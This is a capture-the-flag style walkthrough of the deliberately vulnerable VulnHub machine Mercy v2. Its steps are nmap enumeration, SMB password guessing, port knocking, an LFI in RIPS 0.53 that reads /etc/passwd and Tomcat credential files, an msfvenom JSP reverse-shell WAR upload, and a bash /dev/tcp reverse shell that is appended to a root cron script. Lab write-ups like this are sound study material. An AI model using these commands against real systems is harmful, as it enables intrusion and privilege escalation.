
Digitalworld.local Mercy Vulnhub Walkthrough


[Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine in an effort to
fix my enumeration and note-taking abilities after failing the OSCP exam the second time.]

Digitalworld.local Mercy V2 https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/

I liked this box; it reminds me of OSCP exam machines and good Hack The Box machines. It requires enumeration across multiple services, uses several different vulnerabilities, and has three distinct stages: initial access, a user account, and root access. I love the three-stage layout because I’m used to it from Hack The Box, but OSCP machines don’t always have three stages.

Luckily, much of what mattered for solving this box was in the Nmap output; there would have been rabbit holes if I had missed it. It really makes me think that I missed things in the exam that kept me from having a full picture of the machines. I am glad I am now purposefully making sure my enumeration is thorough and that I take good notes (even about the things that don’t work out).

This machine would have been more difficult if there were no robots.txt files.

Flow
1. Enumerate ports
2. Port 8080 – /tryharder/tryharder
3. SMB qiu share works with qiu:password (clue from tryharder file)
4. Download qiu files from SMB share
5. Knock to open up port 22 and port 80 (knockd settings in SMB share file)
6. Find LFI in RIPS 0.53 on port 80
7. Read files on filesystem via LFI
A. Read /etc/passwd to get local usernames
B. Read tomcat configuration to get more logins (tomcat admin and local user)
8. Log in to Tomcat admin interface, upload a reverse shell war file, get a reverse shell
9. Pivot to fluffy user
10. Pop a root shell from a root cronjob, editing a file writable by fluffy
11. Get flag

Initial Enumeration
IP="10.88.42.132"
mkdir -p nmap
nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_$IP $IP
nmap -Pn -sC -sV -p 1000-65535 -oA nmap/nmap_1000plus_$IP $IP
nmap -sC -sU -p 1-1000 -oA nmap/nmap_udp1000_$IP $IP

Top 1000 TCP Ports


# Nmap 7.80 scan initiated Sun Jun 14 12:48:55 2020 as: nmap -Pn -sC -sV -p 1-1000 -oA nmap/nmap_top1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.0014s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
53/tcp open domain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
80/tcp filtered http
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP UIDL RESP-CODES STLS AUTH-RESP-CODE SASL CAPA PIPELINING
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: post-login OK have LOGINDISABLEDA0001 LOGIN-REFERRALS STARTTLS SASL-IR listed Pre-login more capabilities IDLE IMAP4rev1 ID ENABLE LITERAL+
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: Host: MERCY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:


|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: -1s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: mercy
| NetBIOS computer name: MERCY\x00
| Domain name: \x00
| FQDN: mercy
|_ System time: 2020-06-15T00:49:10+08:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-06-14T16:49:10
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


# Nmap done at Sun Jun 14 12:51:36 2020 -- 1 IP address (1 host up) scanned in 160.82 seconds

Remaining 1000+ TCP Ports


Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-14 12:52 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).
Not shown: 64535 closed ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
|_ Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


Nmap done: 1 IP address (1 host up) scanned in 10.92 seconds

UDP Top 1000 Ports


# Nmap 7.80 scan initiated Sun Jun 14 12:56:33 2020 as: nmap -sC -sU -p 1-1000 -oA nmap/nmap_udb1000_10.88.42.132 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00079s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
53/udp open domain
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
|_dns-recursion: Recursion appears to be enabled
68/udp open|filtered dhcpc
123/udp open ntp
| ntp-info:
|_
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
323/udp open|filtered unknown
631/udp open|filtered ipp
MAC Address: 00:0C:29:67:71:C0 (VMware)

Host script results:


|_clock-skew: 8s
|_nbstat: NetBIOS name: MERCY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)

# Nmap done at Sun Jun 14 13:16:06 2020 -- 1 IP address (1 host up) scanned in 1172.80 seconds

SMB Enumeration
[13:21:03] root[ /home/kali/VulnHub/mercy ]# smbclient -L 10.88.42.132
Enter WORKGROUP\root's password:

Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
qiu Disk
IPC$ IPC IPC Service (MERCY server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[13:21:18] root[ /home/kali/VulnHub/mercy ]#

So, qiu is interesting. Keep track of that as a possible user.

TCP 8080 – /tryharder/tryharder Step


Nmap noticed that robots.txt exists and that the path it disallows, /tryharder/tryharder, exists too.

robots.txt
http://10.88.42.132:8080/robots.txt

User-agent: *
Disallow: /tryharder/tryharder

/tryharder/tryharder

The file is base64-encoded; decoded, it reads as follows.

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

Port 8080 – Normal


Attempting to access the manager/admin interface for Tomcat requires a login. So, we need a login (which should be no surprise).
It is Tomcat 7.

SMB Share – qiu


I am a dummy here again. I get that the “password” is clearly spelled out, but I was used to being tricked for some reason, so I tried every word of the decoded tryharder file as the password.

for pass in $(cat tryharder.txt); do echo ">> $pass <<" && smbclient \\\\10.88.42.132\\qiu -U qiu "$pass" 2>/dev/null; done

The loop stopped at the password “password”, which works. I literally said to myself, “you’re a dummy.”

We can log in directly.

Now we should download all the files.

prompt
recurse
mget *

The only important files are config and configprint: configprint is a script that appends several configuration files to the config file. It includes multiple configs, but the one we care about is the knockd configuration, because ports 80 and 22 are filtered (and likely firewalled off).

configprint

#!/bin/bash

echo "Here are settings for your perusal." > config


echo "" >> config
echo "Port Knocking Daemon Configuration" >> config
echo "" >> config
cat "/etc/knockd.conf" >> config
echo "" >> config
echo "Apache2 Configuration" >> config
echo "" >> config
cat "/etc/apache2/apache2.conf" >> config
echo "" >> config
echo "Samba Configuration" >> config
echo "" >> config
cat "/etc/samba/smb.conf" >> config
echo "" >> config
echo "For other details of MERCY, please contact your system administrator." >> config

chown qiu:qiu config

config (knockd parts of interest)

...

[openHTTP]
sequence = 159,27391,4
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
tcpflags = syn

...

[openSSH]
sequence = 17301,28504,9999
seq_timeout = 100
command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
tcpflags = syn
...

Knock Knock
for port in 17301 28504 9999; do nc 10.88.42.132 $port; done
for port in 159 27391 4; do nc 10.88.42.132 $port; done

Enumerate Port 22
# Nmap 7.80 scan initiated Sun Jun 14 14:04:48 2020 as: nmap -sC -sV -oA nmap/nmap_port22tcp_10.88.42.132 -p22 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).

PORT STATE SERVICE VERSION


22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 93:64:02:58:62:0e:e7:85:50:d9:97:ea:8d:01:68:f6 (DSA)
| 2048 13:77:33:9a:49:c0:51:dc:8f:fb:c8:33:17:b2:05:71 (RSA)
| 256 a2:25:3c:cf:ac:d7:0f:ae:2e:8c:c5:14:c4:65:c1:59 (ECDSA)
|_ 256 33:12:1b:6a:98:da:ea:9d:8c:09:94:ed:44:8d:4e:5b (ED25519)
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


# Nmap done at Sun Jun 14 14:04:48 2020 -- 1 IP address (1 host up) scanned in 0.74 seconds

Nothing special there, other than confirming it is Ubuntu, which at least lets us guess file paths (for later).

I tried the qiu login and it didn’t work for SSH.

Port 80
Enumerate
# Nmap 7.80 scan initiated Sun Jun 14 14:02:07 2020 as: nmap -sC -sV -oA nmap/nmap_port80tcp_10.88.42.132 -p80 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00065s latency).

PORT STATE SERVICE VERSION


80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/mercy /nomercy
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .


# Nmap done at Sun Jun 14 14:02:14 2020 -- 1 IP address (1 host up) scanned in 6.73 seconds

Nmap found the robots.txt file and showed the contents. Let’s look at it more.

robots.txt
User-agent: *
Disallow: /mercy
Disallow: /nomercy

Port 80 – /mercy
Welcome to Mercy!

We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.

I made a mental note of that. It rang a bell later.

Port 80 – /nomercy
It is running RIPS 0.53. What is the first thing I should do when I find a web app with a version I have never heard of? Run searchsploit.

Searchsploit lists an LFI in this version of RIPS, and the LFI works against this host.

http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd

Or, to grab it with the surrounding HTML stripped:

wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd | awk -F'? ' '{print $2}'

...
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh

Getting The Tomcat Configuration Files


I wasn’t sure where Ubuntu stores the Tomcat files, so I looked it up. I found https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory and went looking for these files.

/etc/tomcat7/server.xml
/etc/tomcat7/tomcat-users.xml
/etc/tomcat7/web.xml
/etc/tomcat7/catalina.properties

So I grabbed them all and saved them locally; I also had to convert the HTML entities back to plain text.

for file in server.xml tomcat-users.xml web.xml catalina.properties; do wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/$file | awk -F'? ' '{print $2}' | sed -e 's/&quot;/"/g' -e 's/&gt;/>/g' -e 's/&lt;/</g' > $file ; done

Some logins were in the files, including the Tomcat admin/manager account.

thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny

Now that we have the Tomcat admin login, it is time to try to log in with it.
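What separates the two logins is the roles attribute in tomcat-users.xml: the manager roles are what the WAR upload in the next section depends on. The Python below is an added example, not code from the original post; it parses a tomcat-users.xml and lists the accounts that hold manager or host-manager roles. The sample XML is constructed in the shape of a Tomcat 7 file, using the two logins recovered above, with assumed role assignments.

```python
# Added example, not from the original post: find which tomcat-users.xml accounts can
# deploy applications, i.e. run code on the server, as the WAR upload later relies on.
import xml.etree.ElementTree as ET

# manager-* roles control the manager webapp (WAR deploy); admin-* roles control host-manager.
DEPLOY_ROLES = {"manager-gui", "manager-script", "admin-gui", "admin-script"}

def _local(tag):
    """Strip a namespace ({uri}tag -> tag); Tomcat 8.5+ files declare one, Tomcat 7 does not."""
    return tag.rsplit("}", 1)[-1]

def deploy_capable_users(tomcat_users_xml):
    """Map username -> sorted deploy-capable roles, only for users who hold at least one."""
    result = {}
    for el in ET.fromstring(tomcat_users_xml).iter():
        if _local(el.tag) != "user":
            continue
        roles = {r.strip() for r in (el.get("roles") or "").split(",")}
        hits = sorted(roles & DEPLOY_ROLES)
        if hits:
            result[el.get("username")] = hits
    return result

# Constructed sample in the shape of a Tomcat 7 tomcat-users.xml. The two logins are the
# ones recovered in the post; the role assignments are assumed, not taken from the box.
SAMPLE_TOMCAT_USERS = """<tomcat-users>
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <role rolename="tomcat"/>
  <user username="thisisasuperduperlonguser" password="heartbreakisinevitable" roles="manager-gui,admin-gui"/>
  <user username="fluffy" password="freakishfluffybunny" roles="tomcat"/>
</tomcat-users>
"""

if __name__ == "__main__":
    # Anyone who can read this file (here: through the RIPS LFI) gets working deploy logins,
    # because Tomcat stores these passwords in clear text unless a digest realm is configured.
    for user, roles in deploy_capable_users(SAMPLE_TOMCAT_USERS).items():
        print(f"{user}: can deploy via {', '.join(roles)}")
```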

Port 8080 – Tomcat Revisited


thisisasuperduperlonguser:heartbreakisinevitable (Tomcat admin/manager)
fluffy:freakishfluffybunny (Tomcat normal, no access)

Logging in works for thisisasuperduperlonguser:heartbreakisinevitable.

Now time to get our reverse shell. The common thing to do is to use msfvenom to build a .war file, upload the war in the
admin/manager interface, and then browse to the uploaded application which pops a reverse shell.

Generate the reverse shell .war file


msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.88.42.133 LPORT=4444 -f war > sogwtf.war

Start a netcat listener


nc -lvnp 4444

Upload the war file

Spawn reverse shell

Gain Access To The Machine And Pivot To fluffy


The only other creds I have are for fluffy, so I su to that user and take a look around.

timeclock Script
#!/bin/bash

now=$(date)
echo "The system time is: $now." > ../../../../../var/www/html/time
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time
chown www-data:www-data ../../../../../var/www/html/time

An interesting script. It ties in with the port 80 /mercy clue. I didn’t look further and homed in on this. I checked the timestamp on the time file and checked whether fluffy’s crontab was running the script. The file had been updated recently and fluffy had no crontab, so I assumed it was being run by root or by pleadformercy (with elevated permissions to do the chown).

So, I worked to get another reverse shell!

I tested whether I could get a reverse shell with nc.

fluffy@MERCY:~/.private/secrets$ nc -e /bin/bash 10.88.42.133 9000
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
[-P proxy_username] [-p source_port] [-q seconds] [-s source]
[-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
[-x proxy_address[:port]] [destination] [port]
fluffy@MERCY:~/.private/secrets$

I pulled up the trusty pentestmonkey reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to get the bash syntax or the other nc variant with pipes. The bash one worked!

bash -i >& /dev/tcp/10.88.42.133/9000 0>&1

Getting The root Shell


echo 'bash -i >& /dev/tcp/10.88.42.133/9000 0>&1' >> timeclock

And root shell popped!

Get The Flags

Published on October 11, 2020 and last updated on November 16, 2020.


© 2020 Sogon Security, LLC. All Rights Reserved. Any unauthorized use is expressly prohibited.
